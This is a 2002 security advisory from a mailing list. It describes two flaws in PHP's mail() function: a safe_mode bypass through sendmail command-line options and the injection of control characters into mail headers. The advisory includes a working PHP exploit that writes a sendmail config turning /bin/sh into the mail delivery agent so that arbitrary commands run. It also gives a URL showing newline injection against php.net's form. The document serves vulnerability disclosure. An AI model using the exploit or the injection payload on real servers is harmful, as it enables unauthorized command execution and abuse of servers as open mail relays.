[UNIX] PHP Allows Bypassing of safe_mode And Injecting ASCII Control Chars With mail()

From: support@securiteam.com
Date: 08/27/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 27 Aug 2002 21:17:13 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  PHP Allows Bypassing of safe_mode And Injecting ASCII Control Chars With
mail()
------------------------------------------------------------------------

SUMMARY

PHP is a widely used general-purpose scripting language that is especially
suited for Web development and can be embedded into HTML. Two
vulnerabilities exists in mail() PHP function. The first one allows to
execute any program/script bypassing safe_mode restriction, the second one
may give an open-relay script if mail() function is not carefully used in
PHP scripts.

DETAILS

Vulnerable systems:
 * PHP version 4.x up to 4.2.2

Immune systems:
 * PHP from the CVS has been patched

(1) Bypassing safe_mode restriction
If PHP is configured with safe_mode option enabled, special restriction
are set up including limit on external binaries that may be executed from
within a PHP script.

The fifth argument to the mail() function (introduced in version 4.0.5)
allow specifying command line option to the sendmail binary. Some time ago
a bug was found in the mail() function allowing to pass shell
meta-characters in the 5th argument, leading to execute arbitrary shell
commands or external binaries. This bug was fixed in version 4.1.0.

However, mail() function is still vulnerable because it allows to pass
command line arguments to the sendmail binary which gives the ability to
influence its behavior (i.e. by using non-default aliases, custom
configuration files - other cases are possible with others MTAs)

Passing fifth argument should be disabled if PHP is configured in
safe_mode.

Exploit attached at the end.

(2) Injecting ASCII control characters into mail() arguments
Arbitrary ASCII control characters may be injected into string arguments
of mail() function. If mail() arguments are taken from user's input it may
give the user ability to alter message content including mail headers.

Example of such a vulnerability may be found on PHP.net site:

(URL wrapped for readability)
http://www.php.net/mailing-lists.php?
maillist=your@email.com%0a&email=fake@from.net%0a

PHP should do content filtering before creating message body sent with
"sendmail -t" command.

Impact:
(1) Any user may bypass safe_mode restrictions if mail() function is not
disabled.
(2) Open-relay PHP script if user's data is poorly or not filtered and
passed to the mail() function.

Fix:
(1) Has been successfully fixed in the latest CVS snapshot. Fix for the
(2) is not sufficient and it is still possible to inject ASCII control
characters that causes argument string to be truncated. Please refer to
the example URL mentioned above.

These bugs have not been fixed yet in the latest 4.2.2 stable release.

Exploit:
Sample exploit for (1) that works with sendmail MTA:

- -----8<----- bypass_safe_mode.php -----8<-----
<?
$script=tempnam("/tmp", "script");
$cf=tempnam("/tmp", "cf");

$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);

$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf; ");
fwrite($fd, $cmd);
fclose($fd);

mail("nobody", "", "", "", "-C$cf");
?>
- -----8<----- bypass_safe_mode.php -----8<-----

ADDITIONAL INFORMATION

The information has been provided by <mailto:cliph@isec.pl> Wojciech
Purczynski.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages